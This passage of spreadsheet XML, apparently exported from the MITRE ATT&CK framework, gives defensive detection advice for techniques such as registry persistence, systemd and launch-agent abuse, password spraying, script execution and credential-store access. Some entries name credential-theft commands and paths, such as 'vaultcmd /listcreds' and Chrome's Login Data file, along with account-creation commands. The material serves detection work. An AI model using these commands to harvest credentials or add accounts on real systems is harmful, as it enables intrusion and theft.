    <t>Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as &lt;code&gt;RegCreateKeyEx&lt;/code&gt; and &lt;code&gt;RegSetValueEx&lt;/code&gt; as well as execution of the W32tm.exe utility.(Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk.(Citation: Github W32Time Oct 2017)
The Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers.(Citation: TechNet Autoruns)</t>
  </si>
  <si>
    <t>Monitor for changes to Registry entries associated with Winlogon that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current Winlogon helper values. (Citation: TechNet Autoruns)  New DLLs written to System32 that do not correlate with known good software or patching may also be suspicious.
Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.</t>
  </si>
  <si>
    <t>Malicious XDG autostart entries may be detected by auditing file creation and modification events within the &lt;code&gt;/etc/xdg/autostart&lt;/code&gt; and &lt;code&gt;~/.config/autostart&lt;/code&gt; directories. Depending on individual configurations, defenders may need to query the environment variables &lt;code&gt;$XDG_CONFIG_HOME&lt;/code&gt; or &lt;code&gt;$XDG_CONFIG_DIRS&lt;/code&gt; to determine the paths of Autostart entries. Autostart entry files not associated with legitimate packages may be considered suspicious. Suspicious entries can also be identified by comparing entries to a trusted system baseline.
Suspicious processes or scripts spawned in this manner will have a parent process of the desktop component implementing the XDG specification and will execute as the logged on user.</t>
  </si>
  <si>
    <t>Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.</t>
  </si>
  <si>
    <t>Monitor for changes to Registry values associated with Windows logon scrips, nameley &lt;code&gt;HKCU\Environment\UserInitMprLogonScript&lt;/code&gt;.
Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for unexpected changes to RC scripts in the &lt;code&gt;/etc/&lt;/code&gt; directory. Monitor process execution resulting from RC scripts for unusual or unknown applications or behavior.
Monitor for &lt;code&gt;/etc/rc.local&lt;/code&gt; file creation. Although types of RC scripts vary for each Unix-like distribution, several execute &lt;code&gt;/etc/rc.local&lt;/code&gt; if present. </t>
  </si>
  <si>
    <t>The &lt;code&gt;/Library/StartupItems&lt;/code&gt; folder can be monitored for changes. Similarly, the programs that are actually executed from this mechanism should be checked against a whitelist.
Monitor processes that are executed during the bootup process to check for unusual or unknown applications and behavior.</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to gather browser bookmark information. Remote access tools with built-in features may interact directly using APIs to gather information. Information may also be acquired through system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained.</t>
  </si>
  <si>
    <t>Inventory and monitor browser extension installations that deviate from normal, expected, and benign extensions. Process and network monitoring can be used to detect browsers communicating with a C2 server. However, this may prove to be a difficult way of initially detecting a malicious extension depending on the nature and volume of the traffic it generates.
Monitor for any new items written to the Registry or PE files written to disk. That may correlate with browser extension installation.
On macOS, monitor the command line for usage of the profiles tool, such as &lt;code&gt;profiles install -type=configuration&lt;/code&gt;. Additionally, all installed extensions maintain a &lt;code&gt;plist&lt;/code&gt; file in the &lt;code&gt;/Library/Managed Preferences/username/&lt;/code&gt; directory. Ensure all listed files are in alignment with approved extensions.(Citation: xorrior chrome extensions macOS)</t>
  </si>
  <si>
    <t>This may be a difficult technique to detect because adversary traffic may be masked by normal user traffic. New processes may not be created and no additional software dropped to disk. Authentication logs can be used to audit logins to specific web applications, but determining malicious logins versus benign logins may be difficult if activity matches typical user behavior. Monitor for [Process Injection](https://attack.mitre.org/techniques/T1055) against browser applications.</t>
  </si>
  <si>
    <t>Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials. Also monitor for many failed authentication attempts across various accounts that may result from password spraying attempts. It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network.</t>
  </si>
  <si>
    <t>Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.</t>
  </si>
  <si>
    <t>It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network. Consider focusing efforts on detecting other adversary behavior used to acquire credential materials, such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).</t>
  </si>
  <si>
    <t>Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). Specifically, monitor for many failed authentication attempts across various accounts that may result from password spraying attempts.
Consider the following event IDs:(Citation: Trimarc Detecting Password Spraying)
* Domain Controllers: "Audit Logon" (Success &amp; Failure) for event ID 4625.
* Domain Controllers: "Audit Kerberos Authentication Service" (Success &amp; Failure) for event ID 4771.
* All systems: "Audit Logon" (Success &amp; Failure) for event ID 4648.</t>
  </si>
  <si>
    <t>Monitor for unexpected Docker image build requests to the Docker daemon on hosts in the environment. Additionally monitor for subsequent network communication with anomalous IPs that have never been seen before in the environment that indicate the download of malicious code.</t>
  </si>
  <si>
    <t>Access to the clipboard is a legitimate function of many applications on an operating system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity.</t>
  </si>
  <si>
    <t>Establish centralized logging for the activity of cloud infrastructure components. Monitor logs for actions that could be taken to gather information about cloud infrastructure, including the use of discovery API calls by new or unexpected users and enumerations from unknown or malicious IP addresses. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.</t>
  </si>
  <si>
    <t>Monitor account activity logs to see actions performed and activity associated with the cloud service management console. Some cloud providers, such as AWS, provide distinct log events for login attempts to the management console.(Citation: AWS Console Sign-in Events)</t>
  </si>
  <si>
    <t>Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
Normal, benign system and network events that look like cloud service discovery may be uncommon, depending on the environment and how they are used. Monitor cloud service usage for anomalous behavior that may indicate adversarial presence within the environment.</t>
  </si>
  <si>
    <t xml:space="preserve">System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained. 
Monitor cloud logs for API calls used for file or object enumeration for unusual activity. </t>
  </si>
  <si>
    <t>Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.
If scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information discovery, collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.</t>
  </si>
  <si>
    <t>Monitor for execution of AppleScript through &lt;code&gt;osascript&lt;/code&gt; and usage of the &lt;code&gt;NSAppleScript&lt;/code&gt; and &lt;code&gt;OSAScript&lt;/code&gt; APIs that may be related to other suspicious behavior occurring on the system. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.
Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.</t>
  </si>
  <si>
    <t>Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.
Monitor for execution of JXA through &lt;code&gt;osascript&lt;/code&gt; and usage of &lt;code&gt;OSAScript&lt;/code&gt; API that may be related to other suspicious behavior occurring on the system.
Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.</t>
  </si>
  <si>
    <t>Consider reviewing command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration.(Citation: Cisco IOS Software Integrity Assurance - Command History)
Consider comparing a copy of the network device configuration against a known-good version to discover unauthorized changes to the command interpreter. The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor.</t>
  </si>
  <si>
    <t>If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.
Monitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)
It is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.(Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.
Consider monitoring for Windows event ID (EID) 400, which shows the version of PowerShell executing in the &lt;code&gt;EngineVersion&lt;/code&gt; field (which may also be relevant to detecting a potential [Downgrade Attack](https://attack.mitre.org/techniques/T1562/010)) as well as if PowerShell is running locally or remotely in the &lt;code&gt;HostName&lt;/code&gt; field. Furthermore, EID 400 may indicate the start time and EID 403 indicates the end time of a PowerShell session.(Citation: inv_ps_attacks)</t>
  </si>
  <si>
    <t>Monitor systems for abnormal Python usage and python.exe behavior, which could be an indicator of malicious activity. Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.</t>
  </si>
  <si>
    <t xml:space="preserve">Unix shell usage may be common on administrator, developer, or power user systems, depending on job function. If scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information discovery, collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script. </t>
  </si>
  <si>
    <t>Monitor for events associated with VB execution, such as Office applications spawning processes, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving VB payloads or scripts, or loading of modules associated with VB languages (ex: vbscript.dll). VB execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programable post-compromise behaviors and could be used as indicators of detection leading back to the source.
Understanding standard usage patterns is important to avoid a high number of false positives. If VB execution is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If VB execution is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Payloads and scripts should be captured from the file system when possible to determine their actions and intent.</t>
  </si>
  <si>
    <t>Usage of the Windows command shell may be common on administrator, developer, or power user systems depending on job function. If scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.</t>
  </si>
  <si>
    <t>Monitor file access on removable media. Detect processes that execute when removable media is mounted.</t>
  </si>
  <si>
    <t>Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during exfiltration (ex: [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).</t>
  </si>
  <si>
    <t>Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment. Look for changes to client software that do not correlate with known software or patch cycles. 
Consider monitoring for anomalous behavior from client applications, such as atypical module loads, file reads/writes, or network connections.</t>
  </si>
  <si>
    <t>Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet. 
Once adversaries have provisioned compromised infrastructure (ex: a server for use in command and control), internet scans may help proactively discover compromised infrastructure. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>Consider monitoring for anomalous resolution changes for domain addresses. Efforts may need to be tailored to specific domains of interest as benign resolution changes are a common occurrence on the internet.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>Once adversaries have provisioned software on a compromised server (ex: for use as a command and control server), internet scans may reveal servers that adversaries have compromised. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>Once adversaries have provisioned software on a compromised VPS (ex: for use as a command and control server), internet scans may reveal VPSs that adversaries have compromised. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>Once adversaries leverage the abused web service as infrastructure (ex: for command and control), it may be possible to look for unique characteristics associated with adversary software, if known.(Citation: ThreatConnect Infrastructure Dec 2020)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).</t>
  </si>
  <si>
    <t xml:space="preserve">Container administration service activities and executed commands can be captured through logging of process execution with command-line arguments on the container and the underlying host. In Docker, the daemon log provides insight into events at the daemon and container service level. Kubernetes system component logs may also detect activities running in and out of containers in the cluster. </t>
  </si>
  <si>
    <t xml:space="preserve">Establish centralized logging for the activity of container and Kubernetes cluster components. This can be done by deploying logging agents on Kubernetes nodes and retrieving logs from sidecar proxies for application pods to detect malicious activity at the cluster level.
Monitor logs for actions that could be taken to gather information about container infrastructure, including the use of discovery API calls by new or unexpected users. Monitor account activity logs to see actions performed and activity associated with the Kubernetes dashboard and other web applications. </t>
  </si>
  <si>
    <t>Monitor for processes and command-line parameters associated with account creation, such as &lt;code&gt;net user&lt;/code&gt; or &lt;code&gt;useradd&lt;/code&gt;. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system and domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain and local system accounts to detect suspicious accounts that may have been created by an adversary.
Collect usage logs from cloud administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.</t>
  </si>
  <si>
    <t>Collect usage logs from cloud user and administrator accounts to identify unusual activity in the creation of new accounts and assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins.</t>
  </si>
  <si>
    <t>Monitor for processes and command-line parameters associated with domain account creation, such as &lt;code&gt;net user /add /domain&lt;/code&gt;. Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows domain controller. (Citation: Microsoft User Creation Event) Perform regular audits of domain accounts to detect suspicious accounts that may have been created by an adversary.</t>
  </si>
  <si>
    <t>Monitor for processes and command-line parameters associated with local account creation, such as &lt;code&gt;net user /add&lt;/code&gt; , &lt;code&gt;useradd&lt;/code&gt; , and &lt;code&gt;dscl -create&lt;/code&gt; . Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system. (Citation: Microsoft User Creation Event) Perform regular audits of local system accounts to detect suspicious accounts that may have been created by an adversary.</t>
  </si>
  <si>
    <t>Monitor for changes to system processes that do not correlate with known software, patch cycles, etc., including by comparing results against a trusted system baseline. New, benign system processes may be created during installation of new software. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.  
Command-line invocation of tools capable of modifying services may be unusual, depending on how systems are typically used in a particular environment. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. 
Monitor for changes to files associated with system-level processes.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor Launch Agent creation through additional plist files and utilities such as Objective-See’s  KnockKnock application. Launch Agents also require files on disk for persistence which can also be monitored via other file monitoring applications.
Ensure Launch Agent's &lt;code&gt; ProgramArguments &lt;/code&gt; key pointing to executables located in the &lt;code&gt;/tmp&lt;/code&gt; or &lt;code&gt;/shared&lt;/code&gt; folders are in alignment with enterprise policy. Ensure all Launch Agents with the &lt;code&gt;RunAtLoad&lt;/code&gt; key set to &lt;code&gt;true&lt;/code&gt; are in alignment with policy. </t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for new files added to the &lt;code&gt;/Library/LaunchDaemons/&lt;/code&gt; folder. The System LaunchDaemons are protected by SIP.
Some legitimate LaunchDaemons point to unsigned code that could be exploited. For Launch Daemons with the &lt;code&gt;RunAtLoad&lt;/code&gt; parameter set to true, ensure the &lt;code&gt;Program&lt;/code&gt; parameter points to signed code or executables are in alignment with enterprise policy. Some parameters are interchangeable with others, such as &lt;code&gt;Program&lt;/code&gt; and &lt;code&gt;ProgramArguments&lt;/code&gt; parameters but one must be present.(Citation: launchd Keywords for plists)
</t>
  </si>
  <si>
    <t>Systemd service unit files may be detected by auditing file creation and modification events within the &lt;code&gt;/etc/systemd/system&lt;/code&gt;, &lt;code&gt;/usr/lib/systemd/system/&lt;/code&gt;, and &lt;code&gt;/home/&lt;username&gt;/.config/systemd/user/&lt;/code&gt; directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user.
Suspicious systemd services can also be identified by comparing results against a trusted system baseline. Malicious systemd services may be detected by using the systemctl utility to examine system wide services: &lt;code&gt;systemctl list-units -–type=service –all&lt;/code&gt;. Analyze the contents of &lt;code&gt;.service&lt;/code&gt; files present on the file system and ensure that they refer to legitimate, expected executables.
Auditing the execution and command-line arguments of the 'systemctl' utility, as well related utilities such as &lt;code&gt;/usr/sbin/service&lt;/code&gt; may reveal malicious systemd service execution.</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could create or modify services. Command-line invocation of tools capable of adding or modifying services may be unusual, depending on how systems are typically used in a particular environment. Services may also be modified through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data. Remote access tools with built-in features may also interact directly with the Windows API to perform these functions outside of typical system utilities. Collect service utility execution and service binary path arguments used for analysis. Service binary paths may even be changed to execute commands or scripts.  
Look for changes to service Registry entries that do not correlate with known software, patch cycles, etc. Service information is stored in the Registry at &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services&lt;/code&gt;. Changes to the binary path and the service startup type changed from manual or disabled to automatic, if it does not typically do so, may be suspicious. Tools such as Sysinternals Autoruns may also be used to detect system service changes that could be attempts at persistence.(Citation: TechNet Autoruns)  
Creation of new services may generate an alterable event (ex: Event ID 4697 and/or 7045 (Citation: Microsoft 4697 APR 2017)(Citation: Microsoft Windows Event Forwarding FEB 2018)). New, benign services may be created during installation of new software.
Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.</t>
  </si>
  <si>
    <t>Monitor system calls, file read events, and processes for suspicious activity that could indicate searching for a password  or other activity related to performing keyword searches (e.g. password, pwd, login, store, secure, credentials, etc.) in process memory for credentials. File read events should be monitored surrounding known password storage applications.</t>
  </si>
  <si>
    <t>Identify web browser files that contain credentials such as Google Chrome’s Login Data database file: &lt;code&gt;AppData\Local\Google\Chrome\User Data\Default\Login Data&lt;/code&gt;. Monitor file read events of web browser files that contain credentials, especially when the reading process is unrelated to the subject web browser. Monitor process execution logs to include PowerShell Transcription focusing on those that perform a combination of behaviors including reading web browser process memory, utilizing regular expressions, and those that contain numerous keywords for common web applications (Gmail, Twitter, Office365, etc.).</t>
  </si>
  <si>
    <t>Unlocking the keychain and using passwords from it is a very common process, so there is likely to be a lot of noise in any detection technique. Monitoring of system calls to the keychain can help determine if there is a suspicious process trying to access it.</t>
  </si>
  <si>
    <t>Consider monitoring API calls, file read events, and processes for suspicious activity that could indicate searching in process memory of password managers. 
Consider monitoring file reads surrounding known password manager applications.</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for activity surrounded users searching for credentials or using automated tools to scan memory for passwords.</t>
  </si>
  <si>
    <t>Monitor process and command-line parameters of &lt;code&gt;vaultcmd.exe&lt;/code&gt; for suspicious activity, such as listing credentials from the Windows Credentials locker (i.e., &lt;code&gt;vaultcmd /listcreds:“Windows Credentials”&lt;/code&gt;).(Citation: Malwarebytes The Windows Vault)
Consider monitoring API calls such as &lt;code&gt;CredEnumerateA&lt;/code&gt; that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)
Consider monitoring file reads to Vault locations, &lt;code&gt;%Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\&lt;/code&gt;, for suspicious activity.(Citation: Malwarebytes The Windows Vault)</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command-line parameters of binaries that could be involved in data destruction activity, such as [SDelete](https://attack.mitre.org/software/S0195). Monitor for the creation of suspicious files as well as high unusual file modification activity. In particular, look for large quantities of file modifications in user directories and under &lt;code&gt;C:\Windows\System32\&lt;/code&gt;.
In cloud environments, the occurrence of anomalous high-volume deletion events, such as the &lt;code&gt;DeleteDBCluster&lt;/code&gt; and &lt;code&gt;DeleteGlobalCluster&lt;/code&gt; events in AWS, or a high quantity of data deletion events, such as &lt;code&gt;DeleteBucket&lt;/code&gt;, within a short period of time may indicate suspicious activity.</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command line parameters of binaries involved in data destruction activity, such as vssadmin, wbadmin, and bcdedit. Monitor for the creation of suspicious files as well as unusual file modification activity. In particular, look for large quantities of file modifications in user directories.
In some cases, monitoring for unusual kernel driver installation activity can aid in detection.
In cloud environments, monitor for events that indicate storage objects have been anomalously replaced by copies.</t>
  </si>
  <si>
    <t>Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values. With some critical processes involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data.</t>
  </si>
  <si>
    <t>Inspect important application binary file hashes, locations, and modifications for suspicious/unexpected values.</t>
  </si>
  <si>
    <t>Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values.</t>
  </si>
  <si>
    <t xml:space="preserve">Detecting the manipulation of data as at passes over a network can be difficult without the appropriate tools. In some cases integrity verification checks, such as file hashing, may be used on critical files as they transit a network. With some critical processes involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data. </t>
  </si>
  <si>
    <t>Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
Consider monitoring accesses and modifications to storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.</t>
  </si>
  <si>
    <t>Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
Consider monitoring accesses and modifications to local storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.</t>
  </si>
  <si>
    <t>Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
